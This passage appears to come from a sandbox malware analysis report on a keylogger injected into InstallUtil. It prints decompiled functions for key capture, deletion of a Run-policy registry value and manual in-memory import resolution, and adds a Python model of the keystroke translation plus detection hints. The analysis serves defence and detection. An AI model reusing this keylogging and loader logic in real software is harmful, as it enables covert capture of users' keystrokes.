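  • Part of subcall function 00408B9A: ToUnicodeEx.USER32(0000005B,0000005B), ref: 00408C13
Similarity
• API ID: State$KeyboardWindow$EventForegroundLayoutProcessThreadUnicode
• String ID: [AltL]$[AltR]
"""

if __name__ == "__main__":
    for name, label in triage(SAMPLE_REPORT).items():
        print(name, label)
```

Run against a full report dump, the output leaves E00409CD4 and its subcall E00408B9A labelled as sample code while the locale and critical-section wrappers drop out as CRT thunks; the "Part of subcall function" lines are kept separately so a wrapper is not misclassified because of what its callees touch.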

                                                                      C-Code - Quality: 65%
                                                                      			E00409CD4(void* __ebx, void* __ecx, void* __edx) {
                                                                      				void* _t4;
                                                                      				void* _t7;
                                                                      				void* _t10;
                                                                      				signed int _t12;
                                                                      				void* _t13;
                                                                      				void* _t17;
                                                                      				void* _t18;
                                                                      				void* _t19;
                                                                      				void* _t20;
                                                                      
                                                                      				_t17 = __edx;
                                                                      				_t10 = __ebx;
                                                                      				_t18 = __ecx;
                                                                      				_t12 = GetKeyState(0x11) & 0x0000ffff;
                                                                      				_t1 = _t18 + 0x4c; // 0x5b
                                                                      				_t4 =  *_t1 - 0xa4;
                                                                      				if(_t4 == 0) {
                                                                      					_t13 = _t20 - 0x18;
                                                                      					_push("[AltL]");
                                                                      					L6:
                                                                      					E00402053(_t10, _t13, _t17, _t19);
                                                                      					return E00408D3B(_t18);
                                                                      				}
                                                                      				_t7 = _t4 - 1;
                                                                      				if(_t7 == 0) {
                                                                      					if(_t12 == 0) {
                                                                      						_t13 = _t20 - 0x18;
                                                                      						_push("[AltR]");
                                                                      						goto L6;
                                                                      					}
                                                                      					return _t7;
                                                                      				} else {
                                                                      					E00408B9A(_t18, _t20 - 0x18);
                                                                      					return E00408D60(_t18);
                                                                      				}
                                                                      			}

Instruction addresses (one per decompiled line, in order): 0x00409cd4 0x00409cd4 0x00409cd7 0x00409cdf 0x00409ce2 0x00409ce5 0x00409cea 0x00409d19 0x00409d1b 0x00409d20 0x00409d20 0x00000000 0x00409d27 0x00409cec 0x00409cef 0x00409d08 0x00409d0d 0x00409d0f 0x00000000 0x00409d0f 0x00409d2d 0x00409cf1 0x00409cf7 0x00409d04 0x00409d04

                                                                      APIs
                                                                      • GetKeyState.USER32(00000011), ref: 00409CD9
                                                                        • Part of subcall function 00408B9A: GetForegroundWindow.USER32(0046E3A8,?,0046E3A8), ref: 00408BCE
                                                                        • Part of subcall function 00408B9A: GetWindowThreadProcessId.USER32(00000000,?), ref: 00408BD9
                                                                        • Part of subcall function 00408B9A: GetKeyboardLayout.USER32(00000000), ref: 00408BE0
                                                                        • Part of subcall function 00408B9A: GetKeyState.USER32(00000010), ref: 00408BEA
                                                                        • Part of subcall function 00408B9A: GetKeyboardState.USER32(?), ref: 00408BF7
                                                                        • Part of subcall function 00408B9A: ToUnicodeEx.USER32(0000005B,0000005B,?,?,00000010,00000000,00000000), ref: 00408C13
                                                                        • Part of subcall function 00408D60: SetEvent.KERNEL32(?,?,?,00409EBD,?,?,?,?,?,00000000), ref: 00408D8C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: State$KeyboardWindow$EventForegroundLayoutProcessThreadUnicode
                                                                      • String ID: [AltL]$[AltR]
                                                                      • API String ID: 3195419117-2658077756
                                                                      • Opcode ID: debad364a546ea0a8c7f1d429ef6f069961bef2edde212643c01937f52e19e23
                                                                      • Instruction ID: f4bdf1393d620bea297cde41b5dd79a1c73b15630dd99e73316fb9c83a89f14f
                                                                      • Opcode Fuzzy Hash: debad364a546ea0a8c7f1d429ef6f069961bef2edde212643c01937f52e19e23
                                                                      • Instruction Fuzzy Hash: 75E0653174022426C828327E6A2E6AE39108F92BA4B44016FF9876B6D7DD6D4D4142CF
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%
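E00409CD4 is the interesting function in this section: it is the keystroke handler behind the "Installs a global keyboard hook" signature. The decompiled logic reads the Ctrl state with GetKeyState(0x11), then switches on the virtual-key code stored at offset 0x4c of the hook context minus 0xa4: 0xa4 (left Alt) is logged as the literal "[AltL]", 0xa5 (right Alt) as "[AltR]" but only when Ctrl is not reported down, and every other key is handed to E00408B9A, which resolves the foreground window's keyboard layout and translates the key with ToUnicodeEx before E00408D60 signals an event. The model below is an added illustration, not the sample's code: the VK_* values are the documented Windows virtual-key codes, the layout table is a constructed stand-in for ToUnicodeEx so it runs offline, and the tokenizer assumes the [Name] convention seen for [AltL] and [AltR] on this page applies to other special keys, which the page does not show. The reading that the Ctrl check exists to skip AltGr (reported by Windows as Ctrl plus right Alt) is an interpretation.

```python
"""
Model of the key handling decompiled as E00409CD4.  Added illustration; not
the sample's code.  ToUnicodeEx is replaced by a constructed layout table.
"""
import re
from dataclasses import dataclass

# Documented Windows virtual-key codes that appear in the decompiled code.
VK_CONTROL = 0x11   # GetKeyState(0x11): is Ctrl down?
VK_LMENU = 0xA4     # the 0xa4 subtracted from the vkCode at offset 0x4c
VK_RMENU = 0xA5     # 0xa4 + 1, the second case of the switch

# Constructed stand-in for ToUnicodeEx on a US layout: vk -> (plain, shifted).
US_LAYOUT = {
    0x41: ("a", "A"), 0x4F: ("o", "O"), 0x31: ("1", "!"),
    0x20: (" ", " "), 0x0D: ("\n", "\n"),
}


@dataclass
class KeyEvent:
    vk: int                   # virtual-key code delivered to the hook
    ctrl_down: bool = False   # what GetKeyState(VK_CONTROL) would report
    shift_down: bool = False  # what GetKeyState(VK_SHIFT) in E00408B9A would report


def translate_key(ev, layout=US_LAYOUT):
    """Return the text the handler appends for one key event, or None."""
    if ev.vk == VK_LMENU:                     # case 0: vkCode - 0xa4 == 0
        return "[AltL]"
    if ev.vk == VK_RMENU:                     # case 1: vkCode - 0xa4 == 1
        # Logged only when Ctrl is up; with Ctrl down the function returns
        # without logging (interpretation: AltGr arrives as Ctrl + right Alt).
        return None if ev.ctrl_down else "[AltR]"
    # Default case: E00408B9A translates through the active layout with the
    # current Shift state; unknown keys produce nothing here.
    pair = layout.get(ev.vk)
    if pair is None:
        return None
    return pair[1] if ev.shift_down else pair[0]


def build_log(events, layout=US_LAYOUT):
    """Concatenate the handler's output for a sequence of hook events."""
    return "".join(t for t in (translate_key(e, layout) for e in events) if t)


# A bracketed word is a special-key token, anything else is one typed char.
# Assumption: the [Name] convention seen for [AltL]/[AltR] covers other keys.
TOKEN_RE = re.compile(r"\[[A-Za-z0-9]+\]|.", re.S)


def tokenize_log(log):
    """Split a recovered keylog buffer back into tokens for review."""
    return TOKEN_RE.findall(log)


if __name__ == "__main__":
    # Constructed event sequence: LAlt, Shift+A, o, Ctrl+RAlt (skipped), Shift+1
    typed = [KeyEvent(VK_LMENU), KeyEvent(0x41, shift_down=True), KeyEvent(0x4F),
             KeyEvent(VK_RMENU, ctrl_down=True), KeyEvent(0x31, shift_down=True)]
    log = build_log(typed)
    print(repr(log), tokenize_log(log))
```

When carving a keylog buffer out of the InstallUtil memory dump referenced in the Memory Dump Source line, the tokenizer gives a quick way to separate the literal "[AltL]"/"[AltR]" markers from typed text; the two strings are also usable as a memory-scan indicator for this payload.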

                                                                      C-Code - Quality: 15%
                                                                      			E00444750(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                      				signed int _v8;
                                                                      				signed int _t4;
                                                                      				intOrPtr* _t16;
                                                                      				signed int _t18;
                                                                      
                                                                      				_push(__ecx);
                                                                      				_t4 =  *0x46c00c; // 0xe1ce05e9
                                                                      				_v8 = _t4 ^ _t18;
                                                                      				_t16 = E0044450A(3, "FlsAlloc", 0x45a0f8, 0x45a100);
                                                                      				if(_t16 == 0) {
                                                                      					TlsAlloc();
                                                                      				} else {
                                                                      					 *0x4544b0(_a4);
                                                                      					 *_t16();
                                                                      				}
                                                                      				return E004318FB(_v8 ^ _t18);
                                                                      			}

Instruction addresses (one per decompiled line, in order): 0x00444755 0x00444756 0x0044475d 0x00444777 0x0044477e 0x0044478f 0x00444780 0x00444785 0x0044478b 0x0044478b 0x004447a3

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Alloc
                                                                      • String ID: <@$FlsAlloc
                                                                      • API String ID: 2773662609-1200716068
                                                                      • Opcode ID: 95008ba7aed6845a399d3d146e004e300dd954b4a79b4395e584fb9cefbbf8b3
                                                                      • Instruction ID: a03641a02393d7144beaed60c3c9b2ec50360191d388f91bcef4af42b99e89ef
                                                                      • Opcode Fuzzy Hash: 95008ba7aed6845a399d3d146e004e300dd954b4a79b4395e584fb9cefbbf8b3
                                                                      • Instruction Fuzzy Hash: C6E02B31B40728B7D710AF659C02B7EBB94DB85B12F10016FFC056B281DE785D1686DE
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Free
                                                                      • String ID: <@$FlsFree
                                                                      • API String ID: 3978063606-2527383359
                                                                      • Opcode ID: 03e64d94a1019cb8f01fbd53ca50404284767660a552e3d6d9fd484fbd3f94fb
                                                                      • Instruction ID: d70316ebbfe4f62d5dedbde804438ee27b77cce19bbe96e4b34e1e21de68f81b
                                                                      • Opcode Fuzzy Hash: 03e64d94a1019cb8f01fbd53ca50404284767660a552e3d6d9fd484fbd3f94fb
                                                                      • Instruction Fuzzy Hash: EDE0E571B41628A79700AF659C02F3EBB90EB85B12F21026AFD065B252DE785E1186DE
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetSystemTimeAsFileTime.KERNEL32(00000000,004373F7), ref: 004449D6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Time$FileSystem
                                                                      • String ID: <@$GetSystemTimePreciseAsFileTime
                                                                      • API String ID: 2086374402-3234813070
                                                                      • Opcode ID: d86e73fade0fedddba97489606abd00f44805e3cc363166d7215167f12b865c9
                                                                      • Instruction ID: db134fc43c64735efce5039f29b62c255ca085f1708cd52405b4b811e3820cdb
                                                                      • Opcode Fuzzy Hash: d86e73fade0fedddba97489606abd00f44805e3cc363166d7215167f12b865c9
                                                                      • Instruction Fuzzy Hash: 60E0E5B1B40718B79710AF69AC02F3EBB90DB84B06F11016BFC065B242E9784D1096DE
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 67%
                                                                      			E00409D2E(void* __ebx, void* __ecx) {
                                                                      				void* _t4;
                                                                      				void* _t7;
                                                                      				signed int _t9;
                                                                      				void* _t10;
                                                                      				void* _t12;
                                                                      				void* _t13;
                                                                      				void* _t14;
                                                                      				void* _t15;
                                                                      
                                                                      				_t7 = __ebx;
                                                                      				_t13 = __ecx;
                                                                      				_t9 = GetKeyState(0x12) & 0x0000ffff;
                                                                      				_t4 =  *((intOrPtr*)(_t13 + 0x4c)) - 0xa2;
                                                                      				if(_t4 == 0) {
                                                                      					if(_t9 == 0) {
                                                                      						_t10 = _t15 - 0x18;
                                                                      						_push("[CtrlL]");
                                                                      						goto L5;
                                                                      					}
                                                                      				} else {
                                                                      					_t4 = _t4 - 1;
                                                                      					if(_t4 == 0) {
                                                                      						_t10 = _t15 - 0x18;
                                                                      						_push("[CtrlR]");
                                                                      						L5:
                                                                      						E00402053(_t7, _t10, _t12, _t14);
                                                                      						return E00408D3B(_t13);
                                                                      					}
                                                                      				}
                                                                      				return _t4;
                                                                      			}

                                                                      APIs
                                                                      • GetKeyState.USER32(00000012), ref: 00409D33
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: State
                                                                      • String ID: [CtrlL]$[CtrlR]
                                                                      • API String ID: 1649606143-2446555240
                                                                      • Opcode ID: 96430967ff6791703fc71616f897d242453a5eb43dca73e56abae2454b004537
                                                                      • Instruction ID: 60b82ade85f9f0c9d907b96aa118b9fee2490ba2c59ae13f80f1a9f6bedd625f
                                                                      • Opcode Fuzzy Hash: 96430967ff6791703fc71616f897d242453a5eb43dca73e56abae2454b004537
                                                                      • Instruction Fuzzy Hash: C3E0862178032057C524353E561AB6A69108F92764F50016FE5836B6D7E9AE8D0103CF
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 58%
                                                                      			E00410F97(void* __ecx, short* __edx, short* _a4) {
                                                                      				void* _v8;
                                                                      				signed int _t6;
                                                                      
                                                                      				_push(__ecx);
                                                                      				if(RegOpenKeyExW(__ecx, __edx, 0, 2,  &_v8) == 0) {
                                                                      					_t6 = RegDeleteValueW(_v8, _a4);
                                                                      					asm("sbb al, al");
                                                                      					return  ~_t6 + 1;
                                                                      				}
                                                                      				return 0;
                                                                      			}

                                                                      APIs
                                                                      • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,0046E588,80000002,80000002,0040AF7A,00000000,?,0046E5A0,pth_unenc,0046E588), ref: 00410FA5
                                                                      • RegDeleteValueW.ADVAPI32(0046E588,?,?,0046E5A0,pth_unenc,0046E588), ref: 00410FB9
                                                                      Strings
                                                                      • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00410FA3
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: DeleteOpenValue
                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                      • API String ID: 2654517830-1051519024
                                                                      • Opcode ID: 1c697e77fcc3fc031c276effbbc6f1ce7b912ade538c6ce889a9df8ca18215b9
                                                                      • Instruction ID: a4514a5ca1b1a686f81940c5fce8398d9c2f0d8bc315c523277aeb7f1c81b387
                                                                      • Opcode Fuzzy Hash: 1c697e77fcc3fc031c276effbbc6f1ce7b912ade538c6ce889a9df8ca18215b9
                                                                      • Instruction Fuzzy Hash: 53E0CD31144308BBDF104F70DD07FFA772CD741F41F104155790556091D765D9855665
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00439FF5(void* __edx, short* _a4, char* _a8, int _a12, intOrPtr _a16) {
                                                                      				char* _v8;
                                                                      				int _v12;
                                                                      				char _v16;
                                                                      				char _v24;
                                                                      				char _v28;
                                                                      				void* __ebx;
                                                                      				char _t34;
                                                                      				int _t35;
                                                                      				int _t38;
                                                                      				long _t39;
                                                                      				char* _t42;
                                                                      				int _t44;
                                                                      				int _t47;
                                                                      				int _t53;
                                                                      				intOrPtr _t55;
                                                                      				void* _t56;
                                                                      				char* _t57;
                                                                      				char* _t62;
                                                                      				char* _t63;
                                                                      				void* _t64;
                                                                      				int _t65;
                                                                      				short* _t67;
                                                                      				short* _t68;
                                                                      				int _t69;
                                                                      				intOrPtr* _t70;
                                                                      
                                                                      				_t64 = __edx;
                                                                      				_t53 = _a12;
                                                                      				_t67 = _a4;
                                                                      				_t68 = 0;
                                                                      				if(_t67 == 0) {
                                                                      					L3:
                                                                      					if(_a8 != _t68) {
                                                                      						E004370F7(_t53,  &_v28, _t64, _a16);
                                                                      						_t34 = _v24;
                                                                      						__eflags = _t67;
                                                                      						if(_t67 == 0) {
                                                                      							__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
                                                                      							if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
                                                                      								_t69 = _t68 | 0xffffffff;
                                                                      								_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t68, _t68);
                                                                      								__eflags = _t35;
                                                                      								if(_t35 != 0) {
                                                                      									L29:
                                                                      									_t28 = _t35 - 1; // -1
                                                                      									_t69 = _t28;
                                                                      									L30:
                                                                      									__eflags = _v16;
                                                                      									if(_v16 != 0) {
                                                                      										_t55 = _v28;
                                                                      										_t31 = _t55 + 0x350;
                                                                      										 *_t31 =  *(_t55 + 0x350) & 0xfffffffd;
                                                                      										__eflags =  *_t31;
                                                                      									}
                                                                      									return _t69;
                                                                      								}
                                                                      								 *((intOrPtr*)(E00439941())) = 0x2a;
                                                                      								goto L30;
                                                                      							}
                                                                      							_t70 = _a8;
                                                                      							_t56 = _t70 + 1;
                                                                      							do {
                                                                      								_t38 =  *_t70;
                                                                      								_t70 = _t70 + 1;
                                                                      								__eflags = _t38;
                                                                      							} while (_t38 != 0);
                                                                      							_t69 = _t70 - _t56;
                                                                      							goto L30;
                                                                      						}
                                                                      						__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
                                                                      						if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
                                                                      							_t69 = _t68 | 0xffffffff;
                                                                      							_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t67, _t53);
                                                                      							__eflags = _t35;
                                                                      							if(_t35 != 0) {
                                                                      								goto L29;
                                                                      							}
                                                                      							_t39 = GetLastError();
                                                                      							__eflags = _t39 - 0x7a;
                                                                      							if(_t39 != 0x7a) {
                                                                      								L21:
                                                                      								 *((intOrPtr*)(E00439941())) = 0x2a;
                                                                      								 *_t67 = 0;
                                                                      								goto L30;
                                                                      							}
                                                                      							_t42 = _a8;
                                                                      							_t57 = _t42;
                                                                      							_v8 = _t57;
                                                                      							_t65 = _t53;
                                                                      							__eflags = _t53;
                                                                      							if(_t53 == 0) {
                                                                      								L20:
                                                                      								_t44 = MultiByteToWideChar( *(_v24 + 8), 1, _t42, _t57 - _t42, _t67, _t53);
                                                                      								__eflags = _t44;
                                                                      								if(_t44 != 0) {
                                                                      									_t69 = _t44;
                                                                      									goto L30;
                                                                      								}
                                                                      								goto L21;
                                                                      							} else {
                                                                      								goto L15;
                                                                      							}
                                                                      							while(1) {
                                                                      								L15:
                                                                      								_t45 =  *_t57;
                                                                      								_v12 = _t65 - 1;
                                                                      								__eflags =  *_t57;
                                                                      								if(__eflags == 0) {
                                                                      									break;
                                                                      								}
                                                                      								_t47 = E00445A9C(__eflags, _t45 & 0x000000ff,  &_v24);
                                                                      								_t62 = _v8;
                                                                      								__eflags = _t47;
                                                                      								if(_t47 == 0) {
                                                                      									L18:
                                                                      									_t65 = _v12;
                                                                      									_t57 = _t62 + 1;
                                                                      									_v8 = _t57;
                                                                      									__eflags = _t65;
                                                                      									if(_t65 != 0) {
                                                                      										continue;
                                                                      									}
                                                                      									break;
                                                                      								}
                                                                      								_t62 = _t62 + 1;
                                                                      								__eflags =  *_t62;
                                                                      								if( *_t62 == 0) {
                                                                      									goto L21;
                                                                      								}
                                                                      								goto L18;
                                                                      							}
                                                                      							_t42 = _a8;
                                                                      							goto L20;
                                                                      						}
                                                                      						__eflags = _t53;
                                                                      						if(_t53 == 0) {
                                                                      							goto L30;
                                                                      						}
                                                                      						_t63 = _a8;
                                                                      						while(1) {
                                                                      							 *_t67 =  *(_t68 + _t63) & 0x000000ff;
                                                                      							__eflags =  *(_t68 + _t63);
                                                                      							if( *(_t68 + _t63) == 0) {
                                                                      								goto L30;
                                                                      							}
                                                                      							_t68 =  &(_t68[0]);
                                                                      							_t67 =  &(_t67[1]);
                                                                      							__eflags = _t68 - _t53;
                                                                      							if(_t68 < _t53) {
                                                                      								continue;
                                                                      							}
                                                                      							goto L30;
                                                                      						}
                                                                      						goto L30;
                                                                      					}
                                                                      					 *((intOrPtr*)(E00439941())) = 0x16;
                                                                      					return E0043862C() | 0xffffffff;
                                                                      				}
                                                                      				if(_t53 != 0) {
                                                                      					 *_t67 = 0;
                                                                      					goto L3;
                                                                      				}
                                                                      				return 0;
                                                                      			}

                                                                      0x00439ff5
                                                                      0x00439ffe
                                                                      0x0043a003
                                                                      0x0043a006
                                                                      0x0043a00a
                                                                      0x0043a019
                                                                      0x0043a01c
                                                                      0x0043a03c
                                                                      0x0043a041
                                                                      0x0043a044
                                                                      0x0043a046
                                                                      0x0043a114
                                                                      0x0043a11a
                                                                      0x0043a12f
                                                                      0x0043a13b
                                                                      0x0043a141
                                                                      0x0043a143
                                                                      0x0043a152
                                                                      0x0043a152
                                                                      0x0043a152
                                                                      0x0043a155
                                                                      0x0043a155
                                                                      0x0043a159
                                                                      0x0043a15b
                                                                      0x0043a15e
                                                                      0x0043a15e
                                                                      0x0043a15e
                                                                      0x0043a15e
                                                                      0x00000000
                                                                      0x0043a165
                                                                      0x0043a14a
                                                                      0x00000000
                                                                      0x0043a14a
                                                                      0x0043a11c
                                                                      0x0043a11f
                                                                      0x0043a122
                                                                      0x0043a122
                                                                      0x0043a124
                                                                      0x0043a125
                                                                      0x0043a125
                                                                      0x0043a129
                                                                      0x00000000
                                                                      0x0043a129
                                                                      0x0043a04c
                                                                      0x0043a052
                                                                      0x0043a07f
                                                                      0x0043a08b
                                                                      0x0043a091
                                                                      0x0043a093
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0043a099
                                                                      0x0043a09f
                                                                      0x0043a0a2
                                                                      0x0043a0fe
                                                                      0x0043a103
                                                                      0x0043a10b
                                                                      0x00000000
                                                                      0x0043a10b
                                                                      0x0043a0a4
                                                                      0x0043a0a7
                                                                      0x0043a0a9
                                                                      0x0043a0ac
                                                                      0x0043a0ae
                                                                      0x0043a0b0
                                                                      0x0043a0e6
                                                                      0x0043a0f4
                                                                      0x0043a0fa
                                                                      0x0043a0fc
                                                                      0x0043a110
                                                                      0x00000000
                                                                      0x0043a110
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0043a0b2
                                                                      0x0043a0b2
                                                                      0x0043a0b2
                                                                      0x0043a0b5
                                                                      0x0043a0b8
                                                                      0x0043a0ba
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0043a0c4
                                                                      0x0043a0cb
                                                                      0x0043a0ce
                                                                      0x0043a0d0
                                                                      0x0043a0d8
                                                                      0x0043a0d8
                                                                      0x0043a0db
                                                                      0x0043a0dc
                                                                      0x0043a0df
                                                                      0x0043a0e1
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0043a0e1
                                                                      0x0043a0d2
                                                                      0x0043a0d3
                                                                      0x0043a0d6
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0043a0d6
                                                                      0x0043a0e3
                                                                      0x00000000
                                                                      0x0043a0e3
                                                                      0x0043a054
                                                                      0x0043a056
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0043a05c
                                                                      0x0043a05f
                                                                      0x0043a063
                                                                      0x0043a066
                                                                      0x0043a06a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0043a070
                                                                      0x0043a071
                                                                      0x0043a074
                                                                      0x0043a076
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0043a078
                                                                      0x00000000
                                                                      0x0043a05f
                                                                      0x0043a023
                                                                      0x00000000
                                                                      0x0043a02e
                                                                      0x0043a010
                                                                      0x0043a016
                                                                      0x00000000
                                                                      0x0043a016
                                                                      0x0043a16d

                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D15), ref: 0043A08B
                                                                      • GetLastError.KERNEL32 ref: 0043A099
                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043A0F4
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 1717984340-0
                                                                      • Opcode ID: 979b351a470de255499920bc498553a5aff160e65fa3e4c93c730b9e117bb1c4
                                                                      • Instruction ID: 724f22024815ecd3ad7f06be5c7c16fd3ad86f8434a374eae2bff1d91779ba82
                                                                      • Opcode Fuzzy Hash: 979b351a470de255499920bc498553a5aff160e65fa3e4c93c730b9e117bb1c4
                                                                      • Instruction Fuzzy Hash: 0A411831644241AFCF258F65C844BBB7BB4AF09324F14916EF8D59B3A1DB398C21CB5A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 79%
                                                                      			E0040F6E9(intOrPtr* __ecx) {
                                                                      				signed short* _v4;
                                                                      				intOrPtr _v8;
                                                                      				intOrPtr* _v12;
                                                                      				intOrPtr _t33;
                                                                      				intOrPtr _t36;
                                                                      				intOrPtr _t45;
                                                                      				signed short _t46;
                                                                      				signed int _t47;
                                                                      				intOrPtr _t48;
                                                                      				intOrPtr* _t49;
                                                                      				int _t52;
                                                                      				void* _t55;
                                                                      				void* _t57;
                                                                      				intOrPtr _t63;
                                                                      				void _t66;
                                                                      				signed short* _t67;
                                                                      				intOrPtr* _t68;
                                                                      				intOrPtr _t72;
                                                                      				void* _t75;
                                                                      				intOrPtr* _t76;
                                                                      				intOrPtr _t77;
                                                                      				intOrPtr _t78;
                                                                      				void* _t79;
                                                                      
                                                                      				_t79 =  &_v12;
                                                                      				_t76 = __ecx;
                                                                      				_t75 = 1;
                                                                      				_t33 =  *__ecx;
                                                                      				_t77 =  *((intOrPtr*)(__ecx + 4));
                                                                      				_v8 = _t77;
                                                                      				if( *((intOrPtr*)(_t33 + 0x84)) != 0) {
                                                                      					_t55 =  *((intOrPtr*)(_t33 + 0x80)) + _t77;
                                                                      					if(IsBadReadPtr(_t55, 0x14) == 0) {
                                                                      						_t57 = _t55 + 0x10;
                                                                      						while(1) {
                                                                      							L3:
                                                                      							_t36 =  *((intOrPtr*)(_t57 - 4));
                                                                      							if(_t36 == 0) {
                                                                      								goto L24;
                                                                      							}
                                                                      							_t78 =  *((intOrPtr*)(_t76 + 0x24))(_t36 + _t77,  *((intOrPtr*)(_t76 + 0x34)));
                                                                      							if(_t78 == 0) {
                                                                      								SetLastError(0x7e);
                                                                      								goto L23;
                                                                      							} else {
                                                                      								_push(4 +  *(_t76 + 0xc) * 4);
                                                                      								_push( *((intOrPtr*)(_t76 + 8)));
                                                                      								_t63 = E0043A271();
                                                                      								if(_t63 == 0) {
                                                                      									 *((intOrPtr*)(_t76 + 0x2c))(_t78,  *((intOrPtr*)(_t76 + 0x34)));
                                                                      									SetLastError(0xe);
                                                                      									L23:
                                                                      									_t75 = 0;
                                                                      								} else {
                                                                      									 *((intOrPtr*)(_t76 + 8)) = _t63;
                                                                      									 *((intOrPtr*)(_t63 +  *(_t76 + 0xc) * 4)) = _t78;
                                                                      									 *(_t76 + 0xc) =  *(_t76 + 0xc) + 1;
                                                                      									_t66 =  *(_t57 - 0x10);
                                                                      									if(_t66 == 0) {
                                                                      										_t66 =  *_t57;
                                                                      									}
                                                                      									_t72 = _v8;
                                                                      									_t45 =  *_t57 + _t72;
                                                                      									_t67 = _t66 + _t72;
                                                                      									while(1) {
                                                                      										_v4 = _t67;
                                                                      										_v12 = _t45;
                                                                      										if( *_t67 == 0) {
                                                                      											break;
                                                                      										}
                                                                      										_t46 =  *_t67;
                                                                      										_push( *((intOrPtr*)(_t76 + 0x34)));
                                                                      										if(_t46 >= 0) {
                                                                      											_t47 = _t46 + _t72 + 2;
                                                                      										} else {
                                                                      											_t47 = _t46 & 0x0000ffff;
                                                                      										}
                                                                      										_t48 =  *((intOrPtr*)(_t76 + 0x28))(_t78, _t47);
                                                                      										_t68 = _v12;
                                                                      										_t79 = _t79 + 0xc;
                                                                      										 *_t68 = _t48;
                                                                      										_t49 = _t68;
                                                                      										if( *_t49 == 0) {
                                                                      											_t75 = 0;
                                                                      										} else {
                                                                      											_t72 = _v8;
                                                                      											_t67 =  &(_v4[2]);
                                                                      											_t45 = _t49 + 4;
                                                                      											continue;
                                                                      										}
                                                                      										L17:
                                                                      										if(_t75 == 0) {
                                                                      											 *((intOrPtr*)(_t76 + 0x2c))(_t78,  *((intOrPtr*)(_t76 + 0x34)));
                                                                      											SetLastError(0x7f);
                                                                      										} else {
                                                                      											_t57 = _t57 + 0x14;
                                                                      											_t52 = IsBadReadPtr(_t57 - 0x10, 0x14);
                                                                      											_t77 = _v8;
                                                                      											if(_t52 == 0) {
                                                                      												goto L3;
                                                                      											} else {
                                                                      											}
                                                                      										}
